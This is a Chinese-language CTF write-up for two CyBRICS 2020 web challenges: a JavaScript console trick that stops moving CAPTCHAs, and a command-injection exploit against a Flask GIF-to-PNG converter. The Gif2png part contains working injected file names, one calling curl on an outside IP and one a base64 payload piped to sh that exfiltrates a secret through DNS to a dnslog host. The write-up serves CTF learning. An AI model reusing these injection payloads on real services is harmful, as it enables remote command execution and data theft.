cybrics2020 web部分 wp

Hunt (Web, Baby, 50 pts)

题目描述:

Author: Vlad Roskov ([@mrvos](https://t.me/mrvos))

I couldn't not make this web10

[**http://109.233.57.94:54040/**](http://109.233.57.94:54040/)

*Shamelessly taken from © Matthew Rayfield*

一群飞舞的验证码。。。

要点击5个才能拿到flag,而且时间不能太长

查看页面js:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
function addCaptcha() {
const captchaBox = document.createElement('div');
const widgetId = grecaptcha.render(captchaBox, {
'sitekey' : '6Ld0sCEUAAAAAKu8flcnUdVb67kCEI_HYKSwXGHN',
'theme' : 'light',
'callback': 'good',
});

captchaBox.className = 'captcha';
document.body.appendChild(captchaBox);

count ++;
updateStatus();

let dividerA = (Math.random() * 250) + 250;
let dividerB = (Math.random() * 250) + 250;
let dividerC = (Math.random() * 25) + 25;

function loop() {
const height = window.innerHeight - captchaBox.offsetHeight;
captchaBox.style.top = Math.sin(Date.now()/dividerA) * (height/2) + (height/2);

const width = window.innerWidth - captchaBox.offsetWidth;
captchaBox.style.left = Math.sin(Date.now()/dividerB) * (width/2) + (width/2);

captchaBox.style.transform = `rotate(${Math.sin(Date.now()/dividerC) * 10}deg)`;

setTimeout(loop, 1);
}
loop();
}

每次添加验证码的时候都会调用loop(),它的作用就是使验证码飞起来;那么重写这个函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
function addCaptcha() {
const captchaBox = document.createElement('div');
const widgetId = grecaptcha.render(captchaBox, {
'sitekey' : '6Ld0sCEUAAAAAKu8flcnUdVb67kCEI_HYKSwXGHN',
'theme' : 'light',
'callback': 'good',
});

captchaBox.className = 'captcha';
document.body.appendChild(captchaBox);

count ++;
updateStatus();
}

在console窗口输入这个函数,然后手动去调用它,出现的验证码就是静止的了;点击五个获得flag:

cybrics{Th0se_c4p7ch4s_c4n_hunter2_my_hunter2ing_hunter2}

Gif2png (Web, Easy, 52 pts)

题目描述:

Author: Alexander Menshchikov ([@n0str](https://t.me/n0str))

The webdev department created another cool startup. Here you can convert any animated GIF to PNG images. It's only left to figure out how to monetize it: [**gif2png-cybrics2020.ctf.su/**](http://gif2png-cybrics2020.ctf.su/)

Sources [are available](https://cybrics.net/files/gif2png.tar.gz)

题目是使用flask写的一个上传gif图片后会自动转换为png的web应用。查看源码,其对上传的图片有以下检测和过滤:

def allowed_file(filename):
    return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS

if file.content_type != "image/gif":

if not bool(re.match("^[a-zA-Z0-9_\-. '\"\=\$\(\)\|]*$", file.filename)) or ".." in file.filename:

filename = secure_filename(file.filename)

if mime_type != "image/gif":

文件名经过处理后,有一个命令执行的点:

command = subprocess.Popen(f"ffmpeg -i 'uploads/{file.filename}' \"uploads/{uid}/%03d.png\"", shell=True)

那么要想办法构造文件名,使其能够命令执行;

开始想的构造:

f"ffmpeg -i 'uploads/{__import__('os').popen('ls').read() if 1 else ().gif}'"

即文件名为:

__import__('os').popen('ls').read() if 1 else ().gif

这样是能够绕过那些if判断并能够执行命令的,但是,它最后会经过secure_filename转换,会变成:

import__os.popenls.read_if_1_else_.gif

测试可以看到,括号、空格、开始和结尾的下划线、引号都会被替换成空,那么就要想办法进行沙箱逃逸,payload中不能含有括号、引号,且结尾为.gif

才发现上面想的都是错的,因为f-string中的filename是没有经过secure_filename转换的,而且它只是渲染了这个文件名变量。。。。

可以直接进行命令执行:

a'||curl 62.234.60.226||'.gif

这样实际执行的是:

ffmpeg -i 'uploads/a'||curl 62.234.60.226||'.gif' "uploads/bec4eb15-aba2-4be7-a0c9-8f3497db76da/%03d.png"

测试发现目标应用不能使用curl命令,且文件名不能含有反引号、分号、斜杠,使用dnslog发现可以接收到ping

那么使用dnslog结合grep,将flag值带出去

本地测试:

gtfly@192 gif2png % grep -wo 'cybrics{.*'  main.py
cybrics{********************************}"
  • -w, –word-regexp:The expression is searched for as a word (as if surrounded by [[:<:]]' and[[:>:]]’;

  • -o, –only-matching:Prints only the matching part of the lines.

再用base64编码,然后将=替换为1:

grep -wo 'cybrics{.*'  main.py|base64|sed 's/=/1/g'

Pyaload:

a=$(grep -wo 'cybrics{.*'  main.py|base64|sed 's/=/1/g');ping $a.dup4.l.dnslog.io

进行base编码:

echo YT0kKGdyZXAgLXdvICdjeWJyaWNzey4qJyAgbWFpbi5weXxiYXNlNjR8c2VkICdzLz0vMS9nJyk7cGluZyAkYS5kdXA0LmwuZG5zbG9nLmlv|base64 -d|sh

最终构造的文件名为:

a'||echo YT0kKGdyZXAgLXdvICdjeWJyaWNzey4qJyAgbWFpbi5weXxiYXNlNjR8c2VkICdzLz0vMS9nJyk7cGluZyAkYS5kdXA0LmwuZG5zbG9nLmlv|base64 -d|sh||'.gif

1换成=解码,得到flag:

cybrics{imagesaresocoolicandrawonthem}